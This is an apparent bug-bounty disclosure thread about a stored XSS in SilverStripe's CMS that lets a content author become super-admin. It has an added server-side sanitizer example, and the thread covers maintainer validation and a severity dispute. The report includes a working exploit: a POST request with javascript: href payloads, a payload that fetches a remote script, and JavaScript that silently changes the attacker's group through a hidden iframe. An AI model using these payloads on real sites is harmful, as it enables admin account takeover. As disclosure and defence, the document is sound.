Stored xss bug to hijack admin account in silverstripe/silverstripe-framework

Valid

Reported on

Mar 27th 2022


Description

Using this XSS, a lower-level user can change his role to super-admin and hijack the admin account.

Proof of Concept

1. First, from the super-admin account go to http://localhost/silverstripe/admin/security/#Root_Users and add user-B as a Content Author.
Also give user-B permission only to the Pages section.
2. Now from the user-B account go to any page and edit it, e.g. http://localhost/silverstripe/admin/pages/edit/show/7.
After editing, save it; the request below is sent to the server:

POST /silverstripe/admin/pages/edit/EditForm/7/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Pjax: CurrentForm,Breadcrumbs
X-Requested-With: XMLHttpRequest
Content-Length: 1967
Origin: http://localhost
Connection: close
Referer: http://localhost/silverstripe/admin/pages/edit/show/7
Cookie: 

Title=admin-pageNew+Page&URLSegment=admin-pagenew-page&MenuTitle=admin-pageNew+Page&Content=%3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:alert(document.domain)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E&MetaDescription=&ExtraMeta=&ClassName=Page&ParentID=0&SecurityID=5aa9e58c341853a9f4b5320d938debaf514a8b50&ID=7&AbsoluteLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F&LiveLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DLive&StageLink=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin-pagenew-page%2F%3Fstage%3DStage&ArchiveWarningMessage=Warning%3A+This+page+and+all+of+its+child+pages+will+be+unpublished+before+being+sent+to+the+archive.%5Cn%5CnAre+you+sure+you+want+to+proceed%3F&TreeTitle=%3Cspan+class%3D%22jstree-pageicon+page-icon+font-icon-page+class-Page%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22item%22+data-allowedchildren%3D%22%5B%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BPage%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-page%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CErrorPage%5C%5CErrorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BError+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-error%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CRedirectorPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BRedirector+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-redirect%26quot%3B%7D%2C%7B%26quot%3BClassName%26quot%3B%3A%26quot%3BSilverStripe%5C%5CCMS%5C%5CModel%5C%5CVirtualPage%26quot%3B%2C%26quot%3BTitle%26quot%3B%3A%26quot%3BVirtual+Page%26quot%3B%2C%26quot%3BIconClass%26quot%3B%3A%26quot%3Bfont-icon-p-virtual%26quot%3B%7D%5D%22%3Eadmin-pageNew+Page%3C%2Fspan%3E&Action=split&action_save=1&BackURL=http%3A%2F%2Flocalhost%2Fsilverstripe%2Fadmin%2Fpages%2Fedit%2Fshow%2F7

Here, in this request, put the XSS payload %3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:alert(document.domain)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E& in the Content parameter.
If you decode this, you get <p><a title="jhkh" href="javascript:alert(document.domain)">sd</a></p>
Here the JavaScript code javascript:alert(document.domain) is provided.

3. Now go to the admin account, open the above page http://localhost/silverstripe/admin-pagenew-page?stage=Stage, click the link on this page and see that the XSS is executed.

EXPLOIT

  • Tested browser is Chrome on Linux.
  • Admin is logged in to his account.
  • SilverStripe installation at http://localhost/silverstripe

Let the attacker be user-B, who wants to change his role from "Content authors" to super-admin using this XSS.
So user-B now uses the XSS payload below in the above Content parameter:

%3Cp%3E%3Ca+title%3D%22jhkh%22+href%3D%22javascript:var+a=document.createElement('script');a.src='http://localhost/silver.js';document.body.appendChild(a)%22%3Esd%3C%2Fa%3E%3C%2Fp%3E

If you decode this payload, you get:

<p><a title="jhkh" href="javascript:var a=document.createElement('script');a.src='http://localhost/silver.js';document.body.appendChild(a)">sd</a></p>

Flow

1. User-B (attacker) provides the above XSS payload in the page content.
2. Admin opens the page and clicks the link; the JavaScript code is then executed.
3. A new JavaScript file is downloaded from http://localhost/silver.js and executed.
4. The malicious JavaScript code now sends a POST request to POST /silverstripe/admin/pages/edit/EditForm/1/ to change user-B's (attacker's) role from "content authors" to super-admin.
Now user-B becomes super-admin.

Content of the malicious JavaScript:

function prepareFrame() {
    var ifrm = document.createElement("iframe");
    ifrm.setAttribute("src", "http://localhost/silverstripe/admin/security/EditForm/field/Members/item/2/edit"); // attacker loads the form into a hidden iframe to change the role
    ifrm.style.width = "0";
    ifrm.style.height = "0";
    ifrm.setAttribute("id", "hack");
    document.body.appendChild(ifrm);
}
prepareFrame();
var myTimeout = setTimeout(fireing, 6000);

function fireing() {
    document.getElementById("hack").contentWindow.document.getElementById("Form_ItemEditForm_DirectGroups").value = 2; // change group to super-admin
    document.getElementById("hack").contentWindow.document.getElementById("Form_ItemEditForm_action_doSave").click(); // submit the form
}


VIDEO POC

https://drive.google.com/file/d/1BXa-h79YgaF4hSdHyOd2kiyBn16rO9Xv/view?usp=sharing

Impact

Using this XSS, a "content author" can execute any JavaScript code in the admin account. So a "Content author" can change his role to super-admin using this XSS.

We are processing your report and will contact the silverstripe/silverstripe-framework team within 24 hours. 5 months ago
ranjit-git modified the report
5 months ago
We have contacted a member of the silverstripe/silverstripe-framework team and are waiting to hear back 4 months ago
We have sent a follow up to the silverstripe/silverstripe-framework team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the silverstripe/silverstripe-framework team. We will try again in 10 days. 4 months ago
4 months ago

Maintainer


Thanks, we replicated this issue at our end. It's a general issue where javascript: in href attributes is not removed server-side.

Could you please confirm if you'd liked to be acknowledged in the official disclosure? Would crediting you as follows be OK?

ranjit-git via huntr.dev

Regards Steve Boyd Silverstripe Product Developer
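The maintainer's diagnosis above is the defender's crux: the Content field is stored as an HTML fragment, and a link whose href carries a javascript: scheme survives into the page the admin later opens. The block below is an added example by the editor, not SilverStripe's sanitizer and not code from the report. It assumes user-authored content is an HTML fragment, that only http, https, mailto and tel are legitimate schemes in URL-bearing attributes, and that active-content tags and on* handlers have no business in a page body. It normalises attribute values the way a browser's URL parser does (tab/CR/LF removed, leading control characters stripped, scheme compared case-insensitively) so entity-encoded variants such as java&#x09;script: are still recognised, and it reports what it dropped so the rejection can be logged or surfaced to the author.

```python
"""Server-side URL-scheme filter for user-authored HTML.

Added example for this report, not SilverStripe code. Assumes stored content
is an HTML fragment (like the Content field in the PoC request) and that only
http, https, mailto and tel are legitimate schemes in URL-bearing attributes.
"""
import html
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# Attributes a browser resolves as URLs (navigation or resource loads).
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}
ALLOWED_SCHEMES = {"http", "https", "mailto", "tel"}
# Active content that has no place in author-supplied page bodies.
BLOCKED_TAGS = {"script", "style", "iframe", "object", "embed"}


def url_scheme(value: str) -> Optional[str]:
    """Return the lowercase scheme a browser would see, or None if relative.

    Mirrors the URL parser's leniency: tab/CR/LF are removed anywhere and
    leading C0 controls and spaces are stripped, so 'java<TAB>script:' (what
    'java&#x09;script:' decodes to) is still recognised as javascript:.
    """
    cleaned = "".join(ch for ch in value if ch not in "\t\n\r")
    cleaned = cleaned.lstrip("".join(chr(c) for c in range(0x21)))
    for i, ch in enumerate(cleaned):
        if ch == ":":
            return cleaned[:i].lower()
        if ch in "/?#":
            return None  # path, query or fragment starts before any scheme
    return None


def is_safe_url(value: str) -> bool:
    """Relative URLs and allow-listed schemes pass; everything else fails."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


class SchemeFilter(HTMLParser):
    """Re-serialises a fragment, dropping unsafe URL attributes and tags."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: List[str] = []
        self.dropped: List[Tuple[str, str, str]] = []  # (tag, attr, value)
        self._skip = 0  # nesting depth inside a blocked tag

    def _emit_tag(self, tag, attrs, self_closing):
        parts = [tag]
        for name, value in attrs:
            value = value or ""
            # on* handlers are dropped outright; URL attributes must pass the scheme check.
            if name.startswith("on") or (
                name in URL_ATTRS and not is_safe_url(value)
            ):
                self.dropped.append((tag, name, value))
                continue
            parts.append('%s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<" + " ".join(parts) + (" />" if self_closing else ">"))

    def handle_starttag(self, tag, attrs):
        if tag in BLOCKED_TAGS:
            self._skip += 1
        elif not self._skip:
            self._emit_tag(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        if tag not in BLOCKED_TAGS and not self._skip:
            self._emit_tag(tag, attrs, True)

    def handle_endtag(self, tag):
        if tag in BLOCKED_TAGS:
            self._skip = max(0, self._skip - 1)
        elif not self._skip:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))
    # Comments, doctypes and processing instructions are silently discarded.


def sanitize_fragment(fragment: str) -> Tuple[str, List[Tuple[str, str, str]]]:
    """Return (clean_html, list of dropped (tag, attribute, value))."""
    parser = SchemeFilter()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    # Constructed sample: the decoded Content value from the report's PoC.
    poc = '<p><a title="jhkh" href="javascript:alert(document.domain)">sd</a></p>'
    clean, dropped = sanitize_fragment(poc)
    print(clean)    # <p><a title="jhkh">sd</a></p>
    print(dropped)  # [('a', 'href', 'javascript:alert(document.domain)')]
```

The filter runs at write time, before the fragment reaches the database, so a later change of front-end editor cannot reintroduce the gap; logging the dropped list gives a cheap detection signal for accounts repeatedly submitting script-scheme links.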

ranjit-git
4 months ago

Researcher


Yes, ok for me to get acknowledged

Jamie Slome
4 months ago

Admin


@maintainer - is this ready to be marked as valid and fixed?

4 months ago

Maintainer


It is a valid issue.

It is not fixed though, and we do not have an ETA yet.

Regards Steve Boyd Silverstripe Product Developer

Jamie Slome
4 months ago

Admin


@maintainer - thanks for the heads up 👍

You can go ahead and mark it as valid using the drop-down below when you are ready. A CVE will not be assigned and the report will remain private.

Only once the fix has been confirmed against the report will it go public :)

silverstripe/silverstripe-framework maintainer modified the report
4 months ago
silverstripe/silverstripe-framework maintainer modified the report
4 months ago
silverstripe/silverstripe-framework maintainer validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
ranjit-git
4 months ago

Researcher


@maintainer I have shown you how an attacker can become super-admin using this XSS bug, and then a lower-level user can perform any activity as super-admin. I have escalated to maximum severity here. I think the severity should be high. Here is the CVSS score: https://ibb.co/n69gDmZ https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H&version=3.1 Can you please tell me how you calculated the CVSS score?

ranjit-git
4 months ago

Researcher



    Attack Vector --> Network
    Attack Complexity --> Low
    Privileges Required --> Low --> low-level privilege required
    User Interaction --> Required --> because the user has to click the attacker's payload
    Scope --> Changed --> because scope is changed to super-admin from a lower-level user
    Confidentiality Impact --> High --> because the attacker gets all confidential information
    Integrity Impact --> High --> because the attacker can perform any activity as super-admin
    Availability Impact --> High --> because all information is available to the attacker

ranjit-git
4 months ago

Researcher


@admin can you look into the CVSS score here? I could have submitted this report as just an "XSS bug", nothing fancier, and it would easily fall under medium severity. But huntr now looks for severity-based reports, and the bounty is calculated based on that. So I escalated it to the maximum impact that an attacker can achieve: using this bug the attacker escalates himself to super-admin and fully hijacks the account of the existing super-admin. After becoming super-admin, the attacker has full control over the dashboard.

Adam Nygate
4 months ago

Admin


Hi Ranjit, given the report content, the maintainer has defined the severity of this security issue. We (huntr) don't influence the severity of reports as the maintainers know their project best.

ranjit-git
4 months ago

Researcher


@admin Then there is no need for severity-based reports. Why the extra work to show the severity of the bug if it is not considered?

ranjit-git
4 months ago

Researcher


Hijacking the admin account only stands at a severity of 5.4.

Adam Nygate
4 months ago

Admin


Hi Ranjit. Let's please stay on topic. If you have no other questions regarding this specific report, then let's take the conversation offline so as to not spam this channel.

We have sent a fix follow up to the silverstripe/silverstripe-framework team. We will try again in 7 days. 4 months ago
We have sent a second fix follow up to the silverstripe/silverstripe-framework team. We will try again in 10 days. 4 months ago
We have sent a third and final fix follow up to the silverstripe/silverstripe-framework team. This report is now considered stale. 3 months ago
silverstripe/silverstripe-framework maintainer confirmed that a fix has been merged on d2c58f 2 months ago
The fix bounty has been dropped